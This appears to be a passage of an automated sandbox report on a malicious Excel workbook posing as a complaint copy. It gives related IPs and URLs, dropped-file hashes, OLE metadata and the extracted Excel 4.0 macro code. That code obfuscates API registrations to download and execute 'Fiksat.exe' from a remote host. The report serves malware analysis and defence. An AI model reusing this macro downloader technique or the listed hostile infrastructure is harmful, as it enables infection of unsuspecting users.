                                                                                                                                                      • Excluded domains from analysis (whitelisted): prod-w.nexus.live.com.akadns.net, arc.msn.com.nsatc.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, audownload.windowsupdate.nsatc.net, au.download.windowsupdate.com.hwcdn.net, nexus.officeapps.live.com, officeclient.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, fs.microsoft.com, prod.configsvc1.live.com.akadns.net, ris-prod.trafficmanager.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, cds.d2s7q6s2.hwcdn.net, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, config.officeapps.live.com, blobcollector.events.data.trafficmanager.net, europe.configsvc1.live.com.akadns.net

                                                                                                                                                      Simulations

                                                                                                                                                      Behavior and APIs

                                                                                                                                                      No simulations

                                                                                                                                                      Joe Sandbox View / Context

                                                                                                                                                      IPs

                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                      103.253.212.59Complaint-Copy_1984632811_11102020.xlsGet hashmaliciousBrowse
                                                                                                                                                      • int.boogieapparel.co.id/jvkuykqpn/4574557.png

                                                                                                                                                      Domains

                                                                                                                                                      No context

                                                                                                                                                      ASN

                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                      RUMAHWEB-AS-IDRumahwebIndonesiaCVIDComplaint-Copy_1984632811_11102020.xlsGet hashmaliciousBrowse
                                                                                                                                                      • 103.253.212.59
                                                                                                                                                      link.exeGet hashmaliciousBrowse
                                                                                                                                                      • 103.253.212.238
                                                                                                                                                      41632852441.xlsGet hashmaliciousBrowse
                                                                                                                                                      • 103.247.9.181
                                                                                                                                                      41632852441.xlsGet hashmaliciousBrowse
                                                                                                                                                      • 103.247.9.181
                                                                                                                                                      4793764614.xlsGet hashmaliciousBrowse
                                                                                                                                                      • 103.247.9.181
                                                                                                                                                      41342317068.xlsGet hashmaliciousBrowse
                                                                                                                                                      • 103.247.9.181
                                                                                                                                                      4793764614.xlsGet hashmaliciousBrowse
                                                                                                                                                      • 103.247.9.181
                                                                                                                                                      41342317068.xlsGet hashmaliciousBrowse
                                                                                                                                                      • 103.247.9.181
                                                                                                                                                      https://farahcarpets.co.id/css/4tO8EFTAA6BpVIbXFlshLDT/Get hashmaliciousBrowse
                                                                                                                                                      • 103.247.10.240
                                                                                                                                                      http://alifmedical.shopGet hashmaliciousBrowse
                                                                                                                                                      • 103.253.214.59
                                                                                                                                                      e-statement 00800028.exeGet hashmaliciousBrowse
                                                                                                                                                      • 103.253.212.224
                                                                                                                                                      Account Statement.exeGet hashmaliciousBrowse
                                                                                                                                                      • 103.253.212.224
                                                                                                                                                      Standard Chartered.exeGet hashmaliciousBrowse
                                                                                                                                                      • 103.253.212.224
                                                                                                                                                      linksco.exeGet hashmaliciousBrowse
                                                                                                                                                      • 103.253.212.238
                                                                                                                                                      SecuriteInfo.com.Trojan.PWS.Siggen2.55747.31377.exeGet hashmaliciousBrowse
                                                                                                                                                      • 103.247.10.55
                                                                                                                                                      Shipping documents .docGet hashmaliciousBrowse
                                                                                                                                                      • 103.247.10.55
                                                                                                                                                      linkercre.exeGet hashmaliciousBrowse
                                                                                                                                                      • 103.247.10.55
                                                                                                                                                      cjwe.exeGet hashmaliciousBrowse
                                                                                                                                                      • 103.247.10.55
                                                                                                                                                      Contract .docGet hashmaliciousBrowse
                                                                                                                                                      • 103.247.8.223
                                                                                                                                                      41508013809.xlsGet hashmaliciousBrowse
                                                                                                                                                      • 103.247.9.181

                                                                                                                                                      JA3 Fingerprints

                                                                                                                                                      No context

                                                                                                                                                      Dropped Files

                                                                                                                                                      No context

                                                                                                                                                      Created / dropped Files

                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\514913CD-09DC-49EE-A35E-AC55604C79F5
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                      File Type:XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):129952
                                                                                                                                                      Entropy (8bit):5.378353741237981
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:1536:EcQceNWiA3gZwLpQ9DQW+zAUH34ZldpKWXboOilXPErLL8TT:WmQ9DQW+zBX8u
                                                                                                                                                      MD5:3FA1CBB26E3BAA5810D0B03A38C3F89B
                                                                                                                                                      SHA1:45907A1ED79EA50B7B5C3D3E904AE2DD615EC181
                                                                                                                                                      SHA-256:E3FCB82A29B4A7C5D6A18A4C072970D7AA3B98608471A856F09A6B52E0B4B52A
                                                                                                                                                      SHA-512:4184292002DAA8433B1EFA0A6188BD9125F35C35FC258D356AF38DF0A3A294F66B5908D50ABF02B351F118E5FB134846F8DC3AAB29E966132FD2547855816C9A
                                                                                                                                                      Malicious:false
                                                                                                                                                      Reputation:low
                                                                                                                                                      Preview: <?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2020-11-20T19:59:55">.. Build: 16.0.13517.30525-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:
                                                                                                                                                      C:\Users\user\AppData\Local\Temp\DE810000
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):25869
                                                                                                                                                      Entropy (8bit):7.554820357800133
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:384:qcG9hUr/gcYZzIt6sF14lF6lmPMsO8aoVT0QNuzWKPq5br:q7coPzm6sH4f6lmPMsRW+u7q5br
                                                                                                                                                      MD5:46BB2CE6536CCCFFB1694D9881B84D08
                                                                                                                                                      SHA1:C63023690565FEE45BDE078FA79B6496E58E8B00
                                                                                                                                                      SHA-256:1BB2A57A329C8984D28D9F7961E6198EC8C974449B569B5B6BB623B32D94C99D
                                                                                                                                                      SHA-512:352B0D5D1E3736109EBBAAB8308E0A1A6D21CD65792FADB19C2EDE631BCABB472F7E7940E64FA600256185CE9F81119189A5BC117DB534BB64DC629A2465C301
                                                                                                                                                      Malicious:false
                                                                                                                                                      Reputation:low
                                                                                                                                                      Preview: .UMO.1..W.?.|E...UU..........{.k._..H.=c'.....D.....y...kf|...z.....5#V..^i......;.0.....Z..d.../..e..(.a......Q.`.6>.....V$Z..!..~>.}.....)c....f....fA.+%S.Xu../S.L.`.....G...~6............. Y...1.AJ..2..3.....Ys......0.k...,.`....Y.0..}X....F....1.......|.O..7.A...kXH0Mq..BF........^..`*.....?(__.......:.?HG.o.!........Ob....H.~....7...)....<r.+.}.....5.......CE.%.......Ja.UO....opw....> ........]....4l.....a.)xp........>y.......PK..........!...M.............[Content_Types].xml ...(............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Complaint-Copy_1984632811_11102020.xls.LNK
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Sep 30 14:03:41 2020, mtime=Sat Nov 21 03:59:57 2020, atime=Sat Nov 21 03:59:57 2020, length=45568, window=hide
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):2350
                                                                                                                                                      Entropy (8bit):4.674928227762155
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:88JU3RR2oozAyNS0oodDav7aB6my8JU3RR2oozAyNS0oodDav7aB6m:8TmooUGboocOB6pTmooUGboocOB6
                                                                                                                                                      MD5:1B666D0450E950AA445D6640BBF061A3
                                                                                                                                                      SHA1:6EABAACCBC222BE8314C5633E689A61F324989E9
                                                                                                                                                      SHA-256:05744BA04F86006BC994B762EC0D8CB05C34E90021162470DF63C57CB8BBC773
                                                                                                                                                      SHA-512:505DDF3D85FBB27B1C46262674EBE8FE45B3FF600236CD69D7E39C99D75C615074454E2CBDEF72F1CCE76B29A1B6ED96C00AF180D7C67475715787DA59D1F588
                                                                                                                                                      Malicious:true
                                                                                                                                                      Reputation:low
                                                                                                                                                      Preview: L..................F.... ...U.8.:.....(.....(................................P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L..uQq'....................:.....q|..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....P.1.....>Qvx..user.<.......Ny.uQq'.....S.....................)..h.a.r.d.z.....~.1.....>Qwx..Desktop.h.......Ny.uQq'.....Y..............>........D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2.....uQx' .COMPLA~1.XLS..~......>QuxuQx'....h.....................,...C.o.m.p.l.a.i.n.t.-.C.o.p.y._.1.9.8.4.6.3.2.8.1.1._.1.1.1.0.2.0.2.0...x.l.s.......l...............-.......k...........>.S......C:\Users\user\Desktop\Complaint-Copy_1984632811_11102020.xls..=.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.C.o.m.p.l.a.i.n.t.-.C.o.p.y._.1.9.8.4.6.3.2.8.1.1._.1.1.1.0.2.0.2.0...x.l.s.........:..,.LB.)...As...`.......X.......142233...........!a..%.H.VZAj......-.........-..!a..%.H.VZAj......-.........-.............1SPS.XF.L8C....&.m.q......
                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Thu Jun 27 16:19:49 2019, mtime=Sat Nov 21 03:59:57 2020, atime=Sat Nov 21 03:59:57 2020, length=12288, window=hide
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):904
                                                                                                                                                      Entropy (8bit):4.645831755347703
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:12:83OXUtquElPCH21QcU3iYw2+8+WrjAZ/2bDY1LC5Lu4t2Y+xIBjKZm:83CJU3OeAZiD187aB6m
                                                                                                                                                      MD5:BB825BD8C4950022076C96E66E9929E5
                                                                                                                                                      SHA1:381BA458E94D90726CFE5E6269221C831F5F0889
                                                                                                                                                      SHA-256:F93A802E48051A816C4DBE3C68112A82D21D54F0BC981BEBBA5F9430D98EFF03
                                                                                                                                                      SHA-512:351449737EEB85C7503B058362EE1B2AA01FAB4D926B29ADF242BF128F1AA5AF9CC9FD1BFD76E9CC31515BDDA433446188A572AF89E8B8446A72DFEDEACC4C09
                                                                                                                                                      Malicious:false
                                                                                                                                                      Reputation:low
                                                                                                                                                      Preview: L..................F........N....-..}..(...}..(....0......................u....P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L..uQq'....................:.....q|..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....P.1.....>Qvx..user.<.......Ny.uQq'.....S.....................)..h.a.r.d.z.....~.1.....uQ}'..Desktop.h.......Ny.uQ}'.....Y..............>......v[.D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......E...............-.......D...........>.S......C:\Users\user\Desktop........\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...As...`.......X.......142233...........!a..%.H.VZAj...4.4...........-..!a..%.H.VZAj...4.4...........-.............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0.9.-.4.0.5.3.0.6.2.3.3.2.-.1.0.0.2.........9...1SPS..mD..pH.H@..=x.....h....H......K*..@.A..7sFJ............
                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):167
                                                                                                                                                      Entropy (8bit):4.803672494509864
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:oyBVomMYlI9aL+1lI9aLmMYlI9aLv:dj6YluZlugYluw
                                                                                                                                                      MD5:FC7206BE6C7907B5BED8628BD33AEC0A
                                                                                                                                                      SHA1:4807778236817026DB5C5B0A35BBA96EAEC5FF90
                                                                                                                                                      SHA-256:4099AC5F3AD1D122B3240A9C14BAF156A48438D866637CC301EE39EC16B3D1BF
                                                                                                                                                      SHA-512:3CFE6823EB7FCEC718B89D69285EB8C3B5FC036893B0162024E4387649CF9879A49FBA63C51B568B968D16D319CA39645E214283B2C26895132399C47F883CE2
                                                                                                                                                      Malicious:false
                                                                                                                                                      Reputation:low
                                                                                                                                                      Preview: Desktop.LNK=0..[xls]..Complaint-Copy_1984632811_11102020.xls.LNK=0..Complaint-Copy_1984632811_11102020.xls.LNK=0..[xls]..Complaint-Copy_1984632811_11102020.xls.LNK=0..
                                                                                                                                                      C:\Users\user\Desktop\8F810000
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                      File Type:Applesoft BASIC program data, first line number 16
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):71338
                                                                                                                                                      Entropy (8bit):6.185695729358845
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:1536:7XcKoSsxz1PDZLDZjlbR868O8KL5L+WxEtjPOtioVjDGUU1qfDlaGGx+cL2QnAF/:7XcKoSsxzNDZLDZjlbR868O8KL5L+Wx7
                                                                                                                                                      MD5:E8C8BBF9A84FDD9B26FC7D95CB627E92
                                                                                                                                                      SHA1:96183C68B38D463F412204258A973974E00D23F1
                                                                                                                                                      SHA-256:DC4CFBF44D46A5F83E8921A4B73655BC7269C96D96DA0FAF14B6E84FACAB0DFB
                                                                                                                                                      SHA-512:8543E02E9C1D9FE179EB97BC1DF2493E71567BD0B72FB1D1381C09783EDD7F2A0AEDC6740925AC75A34F7DC44E9B1768F3C7FDF3CF75AB9A7EE2F692E092A43C
                                                                                                                                                      Malicious:false
                                                                                                                                                      Reputation:low
                                                                                                                                                      Preview: ........T8..........................\.p.... B.....a.........=.................................................=.....i..9J.8.......X.@...........".......................1................f..C.a.l.i.b.r.i.1................f..C.a.l.i.b.r.i.1................f..C.a.l.i.b.r.i.1................f..C.a.l.i.b.r.i.1................f..C.a.l.i.b.r.i.1................f..C.a.l.i.b.r.i.1................f..C.a.l.i.b.r.i.1.......>........f..C.a.l.i.b.r.i.1.......?........f..C.a.l.i.b.r.i.1.......4........f..C.a.l.i.b.r.i.1...,...8........f..C.a.l.i.b.r.i.1.......8........f..C.a.l.i.b.r.i.1.......8........f..C.a.l.i.b.r.i.1................f..C.a.l.i.b.r.i.1................f..C.a.l.i.b.r.i.1...h...8........f..C.a.m.b.r.i.a.1.......<........f..C.a.l.i.b.r.i.1................f..C.a.l.i.b.r.i.1................f..C.a.l.i.b.r.i.1.......4........f..C.a.l.i.b.r.i.1................f..C.a.l.i.b.r.i.1.........

                                                                                                                                                      Static File Info

                                                                                                                                                      General

                                                                                                                                                      File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1251, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Wed Nov 11 08:23:49 2020, Security: 0
                                                                                                                                                      Entropy (8bit):5.312075712679437
                                                                                                                                                      TrID:
                                                                                                                                                      • Microsoft Excel sheet (30009/1) 78.94%
                                                                                                                                                      • Generic OLE2 / Multistream Compound File (8008/1) 21.06%
                                                                                                                                                      File name:Complaint-Copy_1984632811_11102020.xls
                                                                                                                                                      File size:45568
                                                                                                                                                      MD5:3923517a84aa5cda58fec80a26dfbfac
                                                                                                                                                      SHA1:96339ae67e0634cabaefe3a9f13b0dd29f128781
                                                                                                                                                      SHA256:5958d4456b39343d02e0a90b156112ff2f42ab2f94fb453f722b8c4f1f91b1c4
                                                                                                                                                      SHA512:bbab71efef86a2798308e62eb1fc9c05c6605fa77a24396e872b92a87d5606945deca7a42911ce803133b00ac50ed8599f7768f2d406811329333cdaf71a74d2
                                                                                                                                                      SSDEEP:768:nucKoSsxz1PDZLDZjlbR868O8KldzH3xz7uDphYHceXVhca+fMHLtyeGxcbB8OUk:nucKoSsxz1PDZLDZjlbR868O8KlVH3FH
                                                                                                                                                      File Content Preview:........................>.......................W...........................V..................................................................................................................................................................................

                                                                                                                                                      File Icon

                                                                                                                                                      Icon Hash:74ecd4c6c3c6c4d8

                                                                                                                                                      Static OLE Info

                                                                                                                                                      General

                                                                                                                                                      Document Type:OLE
                                                                                                                                                      Number of OLE Files:1

                                                                                                                                                      OLE File "Complaint-Copy_1984632811_11102020.xls"

                                                                                                                                                      Indicators

                                                                                                                                                      Has Summary Info:True
                                                                                                                                                      Application Name:Microsoft Excel
                                                                                                                                                      Encrypted Document:False
                                                                                                                                                      Contains Word Document Stream:False
                                                                                                                                                      Contains Workbook/Book Stream:True
                                                                                                                                                      Contains PowerPoint Document Stream:False
                                                                                                                                                      Contains Visio Document Stream:False
                                                                                                                                                      Contains ObjectPool Stream:
                                                                                                                                                      Flash Objects Count:
                                                                                                                                                      Contains VBA Macros:True

                                                                                                                                                      Summary

                                                                                                                                                      Code Page:1251
                                                                                                                                                      Author:
                                                                                                                                                      Last Saved By:
                                                                                                                                                      Create Time:2006-09-16 00:00:00
                                                                                                                                                      Last Saved Time:2020-11-11 08:23:49
                                                                                                                                                      Creating Application:Microsoft Excel
                                                                                                                                                      Security:0

                                                                                                                                                      Document Summary

                                                                                                                                                      Document Code Page:1251
                                                                                                                                                      Thumbnail Scaling Desired:False
                                                                                                                                                      Contains Dirty Links:False
                                                                                                                                                      Shared Document:False
                                                                                                                                                      Changed Hyperlinks:False
                                                                                                                                                      Application Version:917504

                                                                                                                                                      Streams

                                                                                                                                                      Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
                                                                                                                                                      General
                                                                                                                                                      Stream Path:\x5DocumentSummaryInformation
                                                                                                                                                      File Type:data
                                                                                                                                                      Stream Size:4096
                                                                                                                                                      Entropy:0.363455520341
                                                                                                                                                      Base64 Encoded:False
                                                                                                                                                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . D o c u S i g n . . . . . . . . . . 1 . . . . . . . . . 3 . . . . . L i v e . . . . . . . . . 2 . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                      Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 f8 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 b5 00 00 00 02 00 00 00 e3 04 00 00
                                                                                                                                                      Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096
                                                                                                                                                      General
                                                                                                                                                      Stream Path:\x5SummaryInformation
                                                                                                                                                      File Type:data
                                                                                                                                                      Stream Size:4096
                                                                                                                                                      Entropy:0.250004009968
                                                                                                                                                      Base64 Encoded:False
                                                                                                                                                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . . | . # . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                      Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 04 00 00 00
                                                                                                                                                      Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 35753
                                                                                                                                                      General
                                                                                                                                                      Stream Path:Workbook
                                                                                                                                                      File Type:Applesoft BASIC program data, first line number 16
                                                                                                                                                      Stream Size:35753
                                                                                                                                                      Entropy:6.21957904962
                                                                                                                                                      Base64 Encoded:True
                                                                                                                                                      Data ASCII:. . . . . . . . f 2 . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . B . . . . . a . . . . . . . . . = . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . i . . 9 J . 8 . . . . . . . X . @ . . . . . . . . . . . " . . .
                                                                                                                                                      Data Raw:09 08 10 00 00 06 05 00 66 32 cd 07 c9 80 01 00 06 06 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 02 00 00 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

                                                                                                                                                      Macro 4.0 Code

                                                                                                                                                      "=REGISTER(Live!Y204,B684,Live!Y206,Live!Y207,,Live!Y208,Live!Y209)","=CONCATENATE(""C"",""reateDirectoryA"")",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=Volate(Live!Y210,Live!Y211)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=Volate(""C:\Gravity\Gravity2"",Live!Y211)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=REGISTER(Live!Z204,Live!Z205,Live!Z206,Live!Z207,,Live!Z208,Live!Z209)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=DFGYUJTYGSRYHEDRTSDGS(0,A697&Live!A310&A696&Live!A300,""C:\Gravity\Gravity2\Fiksat.exe"",0,0)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=REGISTER(""zipfldr"",""RouteTheCall"",""JJCCJ"",""GFJVHYXDYHDTYHXDYHDTY"",,1,9)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=GFJVHYXDYHDTYHXDYHDTY(0,""calc"",""C:\Gravity\Gravity2\Fiksat.exe"",0)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=HALT(),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=?????????(111111,9999999)&"".""",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,http://,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,